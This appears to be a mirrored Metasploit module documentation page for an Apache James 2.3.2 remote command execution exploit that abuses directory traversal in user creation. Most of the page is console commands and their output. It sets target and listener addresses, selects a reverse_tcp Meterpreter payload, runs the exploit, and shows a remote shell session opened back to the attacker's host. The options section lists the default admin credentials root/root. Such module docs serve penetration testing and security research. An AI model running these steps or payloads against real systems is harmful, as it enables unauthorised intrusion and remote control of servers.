adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
195d699df04875b7dbf5aaf1e2d27fb9b3d287cd
metasploit-gs/documentation/modules/exploit/linux/smtp/apache_james_exec.md
T
mattaberegg 195d699df0 Add module documentation.
2020-01-18 19:06:59 -08:00

2.9 KiB
Raw Blame History

Vulnerable Application

This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:
https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf

Verification Steps

  1. Load the module:
  msf5 > use exploit/linux/smtp/apache_james_exec
  1. Set remote and local options:
  msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
  target => 1  
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
  rhosts => 192.168.224.164  
  msf5 exploit(linux/smtp/apache_james_exec) > set rport 25  
  rport => 25  

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
  lhost => 192.168.224.167  
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
  lport => 4444
  1. Set payload:
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp
  1. Check version and run exploit:
  msf5 exploit(linux/smtp/apache_james_exec) > check  
  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
  msf5 exploit(linux/smtp/apache_james_exec) > exploit  

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
  1. Set up and run listener (Can be done before running exploit):
  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
  msf5 exploit(multi/handler) > set lport 4444  
  lport => 4444  
  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
  lhost => 192.168.224.167    

  msf5 exploit(multi/handler) > run  

  [*] Started reverse TCP handler on 192.168.224.167:4444  
  [*] Sending stage (3021284 bytes) to 192.168.224.164  
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  

  meterpreter >

Options

USERNAME: The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
PASSWORD: The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
ADMINPORT: The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
RHOSTS: The IP address of the vulnerable server.
RPORT: The port number of the SMTP service.

Targets

  Id  Name 
  --  ----
  0   Linux x86  
  1   Linux x64

References

  1. https://www.exploit-db.com/exploits/35513
  2. https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
Reference in New Issue View Git Blame Copy Permalink